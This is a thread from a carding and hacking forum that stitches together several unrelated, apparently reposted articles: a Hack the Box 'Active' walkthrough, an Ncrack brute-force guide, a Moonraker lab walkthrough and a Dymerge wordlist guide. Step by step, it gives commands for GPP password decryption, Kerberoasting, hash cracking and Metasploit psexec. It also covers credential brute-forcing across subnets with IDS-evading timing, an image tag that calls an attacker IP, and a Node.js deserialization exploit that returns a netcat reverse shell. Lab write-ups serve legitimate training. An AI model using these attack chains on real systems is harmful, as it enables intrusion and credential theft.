[Guide] How to Hack the Box: Active Walkthrough

[Guide] How to Hack the Box: Active Walkthrough - Printable Version

+- Blackhat Carding Forum | Carding Forum - Credit Cards - Hacking Forum - Cracking Forum | Bhcforums.cc (https://bhcforums.cc)
+-- Forum: Carding Zone (https://bhcforums.cc/Forum-Carding-Zone)
+--- Forum: Carders Home (https://bhcforums.cc/Forum-Carders-Home)
+--- Thread: [Guide] How to Hack the Box: Active Walkthrough (/Thread-Guide-How-to-Hack-the-Box-Active-Walkthrough)

[Guide] How to Hack the Box: Active Walkthrough - NINZA - 05-14-2020

Today we are going to solve another CTF challenge “Active”. Active is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.
Level: Easy
Task: To find user.txt and root.txt file
Penetration Methodologies
Scanning Network

Open ports and Running services (Nmap)

Enumeration

Identify share files (Linux4enum)
Access share file via Anonymous login (smbclient)
Decrypting cpassword (Gpprefdecrypt.py)

Access Victim’s Shell via SMB connect

Access share file user login
Get User.txt

Privilege Escalation

Find Service Principal Names (py)
Crack the hash (Hashcat)
Psexec Exploit (Metasploit)
Get root.txt

Walkthrough
Scanning Network
Note: Since these labs are online available therefore they have a static IP. The IP of Active is 10.10.10.100
Let’s start off with our basic nmap command to find out the open ports and services.
nmap -sV 10.10.10.100
1
nmap -sV 10.10.10.100
[Image: 1.png?w=687&ssl=1]

As you can observe from Nmap scanning result, there are so many open ports along with their running services, the OS is Microsoft Windows server 2008:r2 Confused

p1 and you can also read the domain name “active.htb”.
Enumeration
I try eternal blue attack when I saw port 445 was open but I guess this was Patched version of SMB, therefore I have to start with enum4linux script. As we all know it is the best script for SMB enumeration.
./enum4liux -S 10.10.10.100
1
./enum4liux -S 10.10.10.100
It has shown anonymous login for /Replication share file.
[Image: 2.png?w=687&ssl=1]

Then I try to access /Replication with the help smbclient and run the following command to access this directory via anonymous login:
smbclient //10.10.10.100/Replication
1
smbclient //10.10.10.100/Replication
[Image: 3.png?w=687&ssl=1]

Here I downloaded Groups.xml file which I found from inside the following path:
\active.htb\Policies\{31B2F340–016D-11D2–945F-00C04FB984F9}\MACHINE\Preferences\Groups\
1
\active.htb\Policies\{31B2F340–016D-11D2–945F-00C04FB984F9}\MACHINE\Preferences\Groups\
So here I found cpassword attribute value embedded in the Groups.xml for user SVC_TGS.
[Image: 4.png?w=687&ssl=1]

Therefore I download a python script “Gpprefdecrypt” from GitHub to decrypt the password of local users added via Windows 2008 Group Policy Preferences (GPP) and obtain the password: GPPstillStandingStrong2k18.
python Gpprefdecrypt.py < cpassword attribute value >
1
python Gpprefdecrypt.py < cpassword attribute value >
[Image: 5.png?w=687&ssl=1]

Access Victim’s Shell via SMB connect
Using the above credential we connect to SMB with the help of the following command and successfully able to catch our 1st flag “user.txt” file.
smbclient //10.10.10.100/Users -U SVC_TGS
1
smbclient //10.10.10.100/Users -U SVC_TGS
[Image: 6.png?w=687&ssl=1]

Now, it’s time to hunt root.txt file and as always seen that for obtain root.txt file we need to escalate root privilege, therefore let’s add Host_IP and Host_name inside /etc/hosts file in our local machine.
[Image: 7.png?w=687&ssl=1]

Privilege Escalation
In nmap scanning result we saw port 88 was open for Kerberos, hence there must be some Service Principal Names (SPN) that are associated with the normal user account. Therefore we downloaded and install impacket from Github for using its python class GetUserSPN.py
./GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS:GPPstillStandingStrong2k18
1
./GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS:GPPstillStandingStrong2k18
I copied the hash value into a text file “hash.txt” for its decryption.
[Image: 9.png?w=687&ssl=1]

Then with the help of hashcat, we find out the hash mode and as result, it showed 13100 for Kerberos 5 TGS-REP etype 23
hashcat -h |grep -i tgs
1
hashcat -h |grep -i tgs
Finally, it was time to crack the hashes and obtain the password by using rockyou.txt wordlist.
hashcat -m 13100 hash.txt -a 0 /usr/share/wordlists/rockyou.txt --force --show
1
hashcat -m 13100 hash.txt -a 0 /usr/share/wordlists/rockyou.txt --force --show
Hurray!!! We got it, Ticketmaster1968 for the administrator.
[Image: 10.png?w=687&ssl=1]

Without wasting time I load the Metasploit framework and run the following module to spawn full privilege system shell.
msf > use exploit/windows/smb/psexec
msf exploit windows/smb/psexec) > set rhost 10.10.10.100
msf exploit(windows/smb/psexec) > set smbuser administrator
msf exploit(windows/smb/psexec) > set smbpass Ticketmaster1968
msf exploit(windows/smb/psexec) > exploit
1
2
3
4
5
msf > use exploit/windows/smb/psexec
msf exploit windows/smb/psexec) > set rhost 10.10.10.100
msf exploit(windows/smb/psexec) > set smbuser administrator
msf exploit(windows/smb/psexec) > set smbpass Ticketmaster1968
msf exploit(windows/smb/psexec) > exploit
BOOOMMM…………………
Now we are inside the root shell, let’s chase towards root.txt file and finish this challenge.
[Image: 12.png?w=687&ssl=1]

Yuppieee! We found our 2nd flag the root.txt file from inside /Users/Administrator/Desktop.
[Image: 13.png?w=687&ssl=1]

In this article, we will be exploring the topic of network authentication using Ncrack. Security professionals depend on Ncrack while auditing their clients. The tool is very simple, yet robust in what it offers a penetration tester. It was designed to help the companies in securing their networks by analysis all their hosts and networking devices for weak passwords.
Table of Content
Introduction to Ncrack

Exploring Modules

Authentication Phase

Basic Attack
Dictionary Attack
Brute Force Attack
Pairwise Attack

Misc Phase

Resume the Attack
Stop on Success
Obtain Result in List Format

Output Format

Normal text File
All Format At Once
Append output
Nsock Trace

Timing and Performance

Timing Templates
Service-Specific Options

Target Specification

Input from Nmap’s XML
Input from the Text file
Exclude Host from List

Introduction to Ncrack
Ncrack is a network authentication tool, it helps pentesters find out how vulnerable the credentials protecting a network’s access are. The tool is a part of the Kali Linux arsenal and comes pre-installed with the package. It also has a unique feature to attack multiple targets at once, which is not seen very often in such tools.
Ncrack can be started by typing “ncrack” in the terminal. This shows us all the different options the tool provides us.
ncrack
1
ncrack
syntax: ncrack [Options] {target Confused

ervice specification/port number}
[Image: 0.png?w=687&ssl=1]

Exploring Modules
Ncrack is a very versatile tool, it has modules to test most of the popular forms of network authentication. We can see this by checking the modules.
ncrack –V
1
ncrack –V
[Image: 1.png?w=687&ssl=1]

Authentication Phase
Basic Attack
We have defined this attack as basic because at this phase we only know that port 21 is enabled for FTP service on the victim’s machine. So with the help of the following command, we will try to find out possible FTP login credential.
ncrack

[To see content please register here]

1
ncrack

[To see content please register here]

On executing the above command it will try to crack the password for anonymous login account as shown in the given below image.
[Image: 2.png?w=687&ssl=1]

Dictionary Attack
Suppose you are willing to obtain correct login credential for any account such FTP, SSH or HTTP when you having following situations:
Situation1- Know the only username but don’t know the password
Situation2- Don’t know username but know the password
Situation3- Neither have username nor the password
In such a situation, you should use a wordlist dictionary and then go with ncrack command respectively:
ncrack -user msfadmin -P pass.txt 192.168.0.105:21
ncrack -U user.txt -pass msfadmin 192.168.0.105:21
ncrack -U user.txt -P pass.txt 192.168.0.105:21
1
2
3
ncrack -user msfadmin -P pass.txt 192.168.0.105:21
ncrack -U user.txt -pass msfadmin 192.168.0.105:21
ncrack -U user.txt -P pass.txt 192.168.0.105:21
[Image: 3.png?w=687&ssl=1]

Brute Force Attack
Now, whenever you consider yourself in the following situations:
Situtation1- Close assumption of few usernames and passwords for any host: service and don’t want to use a dictionary then you can go with the following command, this will reduce our effort of guessing truthful credential.
ncrack -user msfadmin,ignite -pass msfadmin,123

[To see content please register here]

1
ncrack -user msfadmin,ignite -pass msfadmin,123

[To see content please register here]

Situtation2- Close assumption of usernames and passwords but there multiple hosts in a network and guessing valid login for destination machine is much time taken process.
Again with the help of ncrack following command you will be able to crack valid login for any host present in the network.
ncrack -user msfadmin,ignite -pass msfadmin,123 192.168.0.1/24:21
1
ncrack -user msfadmin,ignite -pass msfadmin,123 192.168.0.1/24:21
[Image: 4.png?w=687&ssl=1]

Pairwise Attack
choose usernames and passwords in the pair.
If you are not giving any dictionary, then ncrack will go with its default dictionary for pairing password for anonymous login.
ncrack -v --pairwise 192.168.0.105:21
1
ncrack -v --pairwise 192.168.0.105:21
From the given below image, you can observe that we had made successful FTP login with the help of paired password matthew.
[Image: 5.png?w=687&ssl=1]

Misc Phase
Resume the Attack
This is probably the feature that takes the cake. We all know how frustrating the loss of connection or any other technical interruption can be during testing, this is where Ncrack is the blessing. If your attack gets interrupted, you can pick it right up from where you were.
ncrack --resume /root/.ncrack/restore.2018-12-05_04-36
1
ncrack --resume /root/.ncrack/restore.2018-12-05_04-36
[Image: 6.1.png?w=687&ssl=1]

Stop on Success
As you have seen in the above attack that it keeps on cracking the service until it finds the all possible logins but if you want that, the attack should quit cracking service after finding one credential then you should add -f option in the ncrack command.
ncrack -v --pairwise 192.168.0.105:21 -f
1
ncrack -v --pairwise 192.168.0.105:21 -f
[Image: 6.3.png?w=687&ssl=1]

Obtain Result in List Format
It always matters that how will you maintain your penetration testing report and output result while presenting them. Sometimes it is quite hectic to arrange the result in well polish look especially at that time when you have to penetrate multiple host machine. To shoot such hotchpotch, the ncrack has added -sL option which will generate the result in a list format.
ncrack ssh://192.168.0.105 ssh://192.168.0.106 -sL
1
ncrack ssh://192.168.0.105 ssh://192.168.0.106 -sL
[Image: 6.4.png?w=687&ssl=1]

Output Format
Normal text File
If you want to store the output of ncrack result in a Text/XML format.
Then you can go with -oN option to save the result in a text file with the help of given below command and later can use the cat command to read the information saved inside that file.
ncrack -U user.txt -P pass.txt 192.168.0.106:21 192.168.0.105:21 -oN normal.txt
1
ncrack -U user.txt -P pass.txt 192.168.0.106:21 192.168.0.105:21 -oN normal.txt

cat normal.txt
1
cat normal.txt
Or you can switch to –oX option to save the output result in XML format.
ncrack -U user.txt -P pass.txt 192.168.0.106:21 192.168.0.105:21 -oX save.xml
1
ncrack -U user.txt -P pass.txt 192.168.0.106:21 192.168.0.105:21 -oX save.xml
[Image: 6.png?w=687&ssl=1]

All Format At Once
Suppose you want to store the output of ncrack result in both format (.txt, .xml) then you can choose -oA option while executing the command.
ncrack -U user.txt -P pass.txt 192.168.0.106:21 192.168.0.105:21 -oA output
1
ncrack -U user.txt -P pass.txt 192.168.0.106:21 192.168.0.105:21 -oA output
As you can observe that it has stored the result in two formats as “output.ncrack” and “output.xml”.
[Image: 7.png?w=687&ssl=1]

Append output
If the testing is being done in iterations, Ncrack gives us the option to append or add the output to an existing file with ease.
As you can observe that when we try to crack FTP service for the host: 192.168.0.106, it gives ignite:123 as login credential that I had to save in a text file.
ncrack -U user.txt -P pass.txt 192.168.0.106:21 -oN normal.txt
1
ncrack -U user.txt -P pass.txt 192.168.0.106:21 -oN normal.txt
But on crack SMB service for the host: 192.168.0.105, it gives msfadmin:msfadmin as login credential and here I had appended the output in the previous text file.
ncrack -U user.txt -P pass.txt 192.168.0.105:445 -oN normal.txt --append-output
1
ncrack -U user.txt -P pass.txt 192.168.0.105:445 -oN normal.txt --append-output
Conclusion: so by reading normal.txt file we got both output result at one place rather than clobber specified output files.
[Image: 8.png?w=687&ssl=1]

Nsock Trace
Ncrack lets us run the nsock trace on our target while attacking it, we can set the trace level anywhere from 0 to 10 depending on our objective. The output from this operation is quite large.
ncrack -U user.txt -P pass.txt 192.168.0.106:21 --nsock-trace 2
1
ncrack -U user.txt -P pass.txt 192.168.0.106:21 --nsock-trace 2
[Image: 9.png?w=687&ssl=1]

We weren’t kidding when we said the output is large!
Timing and Performance
Timing Templates
Timing template in ncrack is defined by –T<0-5> having -T0 as the slowest and –T5 as the fastest. By default, all ncrack scans run on –T3 timing template. Timing template in Ncrack is used to optimize and improve the quality and performance of the scan to get desired results.
T5: Insane Scan
T4: Aggressive Scan
T3: Normal Scan
T2: Polite Scan
T1: Sneaky Scan
ncrack -U user.txt -P pass.txt 192.168.0.105:21 -T1
1
ncrack -U user.txt -P pass.txt 192.168.0.105:21 -T1
As you can observe from the given below image that it took 187.57 seconds and for this reason, T0 and T1 are used to evade from firewall and IDS/IPS.
ncrack -U user.txt -P pass.txt 192.168.0.105:21 -T5
ncrack -U user.txt -P pass.txt 192.168.0.105:21
1
2
ncrack -U user.txt -P pass.txt 192.168.0.105:21 -T5
ncrack -U user.txt -P pass.txt 192.168.0.105:21
On executing the above command you can compare the time of completing the process in both results, it took 15.01 seconds during T5 and 24.00 seconds during default (T3).
[Image: 11.png?w=687&ssl=1]

Service-Specific Options
cl (min connection limit): minimum number of concurrent parallel connections
CL (max connection limit): maximum number of concurrent parallel connections
at (authentication tries): authentication attempts per connection
cd (connection delay): delay <time> between each connection initiation
cr (connection retires): caps number of service connection attempts
to (time-out): maximum cracking <time> for service, regardless of success so far
You can use the above option while penetrating the whole network for cracking any service.
ncrack ssh://192.168.0.105 -m ftp:cl=10,CL=30,at=5,cd=2ms,cr=10,to=2ms -sL -d
1
ncrack ssh://192.168.0.105 -m ftp:cl=10,CL=30,at=5,cd=2ms,cr=10,to=2ms -sL -d
[Image: 12.png?w=687&ssl=1]

Target Specification
Input from Nmap’s XML
You might be aware of Nmap tool its functionality, suppose while scanning network with the help of nmap you have stored its result in XML format then you can use ncrack -iX option to crack the running services with the help of XML file format.
ncrack -u ignite -pass 123 -iX nmap.xml
1
ncrack -u ignite -pass 123 -iX nmap.xml
As you can observe from the given image that ncrack itself, cracked the password for FTP without specifying any service or port in the command.
[Image: 13.png?w=687&ssl=1]

Input from the Text file
Executing command again and again on multiple hosts is quite time-consuming efforts, therefore, you can place all host IP in a text file and then use it for cracking any particular service.
ncrack -U user.txt -P pass.txt -iL host.txt -p21
1
ncrack -U user.txt -P pass.txt -iL host.txt -p21
[Image: 14.png?w=687&ssl=1]

Exclude Host from List
Suppose you are using a list that contains multiple IP or range of IP and you don’t want to crack service for a specific IP then you can use –exclude option to eliminate that particular IP from list of hosts.
ncrack -U user.txt -P pass.txt -iL host.txt -p21 --exclude 192.168.0.106
1
ncrack -U user.txt -P pass.txt -iL host.txt -p21 --exclude 192.168.0.106
As you can observe, this time it does not crack for 192.168.0.106 and shown the result for the remaining IP.
[Image: 15.png?w=687&ssl=1]

Hack into the Moonraker system and discover who’s behind these menacing plans once and for all. Find and destroy the Villain before it’s too late. You’ve received intelligence of a new Villain investing heavily into Space and Laser Technologies. Although the Villain is unknown we know the motives are ominous and apocalyptic. The challenge is to get root on the Targeted Virtual Machine and read the flag.txt within that directory.
Download it from here:

[To see content please register here]

Penetrating Methodology:

Network Scanning (Netdiscover & Nmap)
Web directory enumeration (Dirb)
Tail off apache2 access logs.
Browsing through discovered directories.
Finding Login Credentials for CouchDB’s Login.
Fauxton Login Page Link.
Checking Various Directories over the browser.
Finding Login Credentials.
Logging into Node.js express framework.
Capturing Cookie using Burpsuite.
Using Node.js deserialization exploit for RCE.
Converting Decimal value to ASCII text.
Using a script to Convert ASCII text to Decimal value.
Base64 encoding using echo.
Getting reverse shell over netcat listener.
Converting Hash string using John the Ripper tool
Getting root access.

Reading the flag.

Let’s Begin with the Walkthrough!!
Let’s start off with scanning the network to find our targets IP.
netdiscover
1
netdiscover
[Image: 1.png?w=687&ssl=1]

We found our target IP –> 192.168.1.110
Our next motive is to scan the target IP with nmap.
nmap -p- -A 192.168.1.110 --open
1
nmap -p- -A 192.168.1.110 --open
The NMAP scan output shows various open ports: 22(ssh), 80(http), 110(pop3), 3000(http), 4369(epmd), 5984(couchdb).
[Image: 2.png?w=687&ssl=1]

From the Nmap Scan output, we saw port 80 is open. Therefore we navigate to port 80 in the web browser. But it was not much of a help to move ahead.
[Image: 3.png?w=687&ssl=1]

Now we thought of enumerating for accessible directories on the Target Machine with the help of the following command.
dirb

[To see content please register here]

1
dirb

[To see content please register here]

After recursively enumerating, we found a useful directory /services as highlighted.
[Image: 4.png?w=687&ssl=1]

Let’s just browse the found directory /services in the browser where at bottom of the webpage we saw a SEND AN INQUIRY Hyperlink. Let’s find out where it will lead us by clicking on it.
[Image: 5.png?w=687&ssl=1]

So it opened a SERVICES INFORMATION REQUEST FORM as shown in the image. We noticed that someone will check our web-based enquiry and will contact us in under 5minutes. This strikes us that some kind of logs will be made. But the question is where?
[Image: 6.png?w=687&ssl=1]

We have filled the enquiry form using the html code with an image tag as shown in the image.
<img src="http://192.168.1.109/1.txt"></img>
1
<img src="http://192.168.1.109/1.txt"></img>
[Image: 7.png?w=687&ssl=1]

Before Clicking Submit to Sales Rep! We have restarted apache2 service because if any logs will be made, we can easily see them by accessing apache2 access.log. After clicking Submit, it has displayed thanks for your inquiry message as shown in the image.
[Image: 8.png?w=687&ssl=1]

We have just tail off the access log of apache2 by using the command.
tail -f /var/log/apache2/access.log
1
tail -f /var/log/apache2/access.log
The log formed exposed a new webpage as highlighted in the image.
[Image: 9.png?w=687&ssl=1]

Let’s just find out where the webpage is going to redirect us. For that, we opened it in the browser.
[Image: 12.png?w=687&ssl=1]

So it leads us to the Sales Admin Interface. This looks interesting and might be holding some great clues.
[Image: 13.png?w=687&ssl=1]

Next thing we opened CouchDB Notes and got some hints about Login Credentials for CouchDB Login that is Username: jaws and Password: jaws girlfriend name + x99. Here we Google for jaws girlfriends name which came out to be dolly.
[Image: 14.png?w=687&ssl=1]

We will be requiring these found Credentials to log into Fauxton which is included in Apache CouchDB. To know more about Fauxton and CouchDB we have searched about them on google and find out a hint on how to open a CouchDB Login Page.
[Image: 15.png?w=687&ssl=1]

Since port 5984 is open. We are able to open the CouchDB Login Page.
192.168.1.110:5984/_utils/
1
192.168.1.110:5984/_utils/
Here we have used Login Credentials as follows:
Username: jaws
Password: dollyx99
1
2
Username: jaws
Password: dollyx99
[Image: 16.png?w=687&ssl=1]

Booyeah!! We have successfully logged in. Now let’s check out the docs inside these 3 databases.
[Image: 17.png?w=687&ssl=1]

The link database came out to be useful. Looking through the documents inside the link database, since every document contains a directory link but the highlighted one might give us clue for our next step.
[Image: 18.png?w=687&ssl=1]

So the link we have found in the highlighted document is shown in the image. Let’s copy and open this link in the browser.
[Image: 19.png?w=687&ssl=1]

So the above link opened an OFFER LETTER ARCHIVE BACKUP WEBPAGE. This is interesting, let’s check out what’s hiding in these offer letters.
[Image: 20.png?w=687&ssl=1]

Woah!! All the offer letters contain a Username and Password. But the one we have used is shown in the image.
[Image: 21.png?w=687&ssl=1]

From the NMAP Scan output, we knew port 3000 holds a Node.js framework. So we browse the Target IP on port 3000 on the browser and encountered a login portal. Credentials use to log in are as follows:
Username: hugo
Password: TempleLasersL2K
1
2
Username: hugo
Password: TempleLasersL2K
[Image: 22.png?w=687&ssl=1]

After successfully logging in, we have displayed a message shown in the image. This page seems of no use but after spending time figuring out what to do next it became very interesting.
[Image: 23.png?w=687&ssl=1]

Time to Launch Burp Suite and intercept the request of this page. After intercepting we saw a base64 encoded line in Cookie: profile as you can see in the image. Here we will be inserting node.js deserialization exploit in base64 encoded form. Let’s begin with the process.
[Image: 24.png?w=687&ssl=1]

From the image, you can figure out that we will copy Node.js deserialization exploit for Remote Code Execution.

[To see content please register here]

After copying it, let’s convert the Decimal value into ASCII text using a converter available online. And don’t forget to copy the ASCII text.
[Image: 26.png?w=687&ssl=1]

Using nano, we have created a file and pasted the ASCII text copied. Here we have given our Kali Linux IP in the host and set the port to 1337 just save it.
[Image: 27.png?w=687&ssl=1]

So we have created a script exploit.py which will convert the ASCII text to Decimal value and it will also put COMMA in between every Decimal value converted. Whereas we are using echo command to convert the Decimal value into Base64 encoded string. And copy the whole base64 string.
[Image: 28.png?w=687&ssl=1]

Set the Copied base64 string into Cookie: profile whose request is intercepted in the Burp suite and before forwarding the request just execute a netcat listener over port 1337.
[Image: 29.png?w=687&ssl=1]

Therefore we got a reverse shell on our netcat listener. To spawn the shell we have used python bin bash shell.
python -c 'import pty; pty.spawn("/bin/bash")'
1
python -c 'import pty; pty.spawn("/bin/bash")'
After recursively enumerating we found four mailboxes in /var/mail but the problem is they lack of permissions. After knowing about CouchDB’s Configuration, we came across that CouchDB’s default installation directory is /opt/CouchDB and it reads the configuration file from this directory etc/local.ini.
Let’s tail off the contents in local.ini.
tail /opt/couchdb/etc/local.ini
1
tail /opt/couchdb/etc/local.ini
After running this command, it displayed another Login Credential as shown in the image.
Username: hugo
Password: 321Blast0ff!!
1
2
Username: hugo
Password: 321Blast0ff!!
Then with the following command, we switch the user and logged in as user hugo.
su hugo
password: 321Blast0ff!!
1
2
su hugo
password: 321Blast0ff!!
[Image: 30.png?w=687&ssl=1]

Reading the emails of Hugo, we were brought to notice that Message 2 is interesting as it contains the password to root in the hash and also tells us to ADD ‘VR00M’ after roots password. Time to crack the password, to do that we have copied the password and pasted inside a file named hash.
[Image: 31.png?w=687&ssl=1]

Therefore, John the Ripper tool cracked the hash password for root i.e
Username: root
Password: cyber
1
2
Username: root
Password: cyber
[Image: 32.png?w=687&ssl=1]

Let’s again switch user and Login as root.
su root
Password: cyberVR00M
1
2
su root
Password: cyberVR00M
Booyeah!! We have successfully logged in as root and while checking through its mail directory, we have found our flag.txt file. We take a look at the content of the file and greeted with a congratulatory message.
[Image: 33.png?w=687&ssl=1]

Hello friends! This article is a comprehensive guide on the Dymerge tool. This is a handy little tool that helps you manage all the dictionaries that you’ve created reading through our blog and using all the amazing tools we’ve written about.
Table of Content

What is Dymerge
Installing and Launching Dymerge
Standard Merge
Fast Mode
Removing Duplicates
Reverse Listing
Alphabetic and Numeric Sorting
Defining Output
Including Characters
Compressing Output

Introduction to Dymerge
Dymerge is a tool that gives you the ability to manage dictionaries. By manage we mean it lets you give the ability to reshape and merge them. Reshaping and merging may seem trivial but considering the fact that you could be dealing with millions of words, even the smallest of operation can turn into a mammoth and complicated task.
Installing and Launching Dymerge
We can install Dymerge from GitHub and launch it in two simple commands. We have used the “– h” flag to display the various options Dymerge has to offer.
git clone

[To see content please register here]

./dymerge.py
1
2
git clone

[To see content please register here]

./dymerge.py
[Image: 1.png?w=687&ssl=1]

Standard Merge
We hope you have a few dictionaries handy to follow through with what we are doing. This a standard merge where we specify the paths to 2 different dictionaries and Dymerge combines them.
To avoid any confusion, the command is “./dymerge.py” followed by the path of the first dictionary, then a space and the path to the second dictionary. The output by default will be in a file named “dymerged.txt”
./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt
1
./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt
[Image: 2.png?w=687&ssl=1]

Fast Mode
Arguably if the dictionaries are very large, performing any operation on them will take time. The person who made Dymerge thought of this conundrum and gave us a way to speed up the process by using the “-f” flag.
./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt -f
1
./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt -f
[Image: 3.png?w=687&ssl=1]

Removing Duplicates
A lot of the dictionary making software’s follow the same logic, so there are bound to be similar words from time to time. Dymerge gives us the option to remove duplicate words from dictionaries while combining them. To achieve this, we will be using the “-u” flag.
./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt -u -f
1
./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt -u -f
[Image: 4.png?w=687&ssl=1]

Reverse Listing
Dymerge gives us the option to reverse the order of the words in the dictionaries that we merge, this means that the first word in the new dictionary will be the last word of the second dictionary.
./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt -r –f
1
./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt -r –f
[Image: 5.png?w=687&ssl=1]

Alphabetic and Numeric Sorting
This option lets us sort words alphabetically, it also sorts numbers by following the progression of a number line from left to right when merging 2 dictionaries to 1. We will be using the “-s” flag to perform this operation.
./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt -s –f
1
./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt -s –f
[Image: 6.png?w=687&ssl=1]

Defining Output
So far we have been letting Dymerge save the output using it’s default settings, this time we will define the file name and destination of the output by using the “-o” flag.
./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt -s -f -o /root/output.txt
1
./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt -s -f -o /root/output.txt
[Image: 7.png?w=687&ssl=1]

Including Characters
Just in case we find that we need something specific added to the dictionary, we can use the “-I” flag. Any characters placed after using the include flag are added to the dictionary.
./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt -s -f -i raj
1
./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt -s -f -i raj
[Image: 8.1.png?w=687&ssl=1]

And here we see “raj” being added to the dictionary.
[Image: 8.2.png?w=687&ssl=1]

Compressing Output
Dictionaries can be pretty big in size, especially when you’re talking about a unified dictionary comprised of multiple dictionaries. Dymerge gives us the option to compress our output using the “-z” flag.
./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt -s -f –z zip
1
./dymerge.py /root/cupp/raj.txt /usr/share/wordlists/rockyou.txt -s -f –z zip
[Image: 9.png?w=687&ssl=1]

All said and done, this is a pretty neat little tool to use when you’re dealing with multiple dictionaries and need something to bring a little bit of order. The functions it performs may seem simple of the face of it but are without a doubt very useful.
Stay tuned for more articles on the latest and greatest in hacking.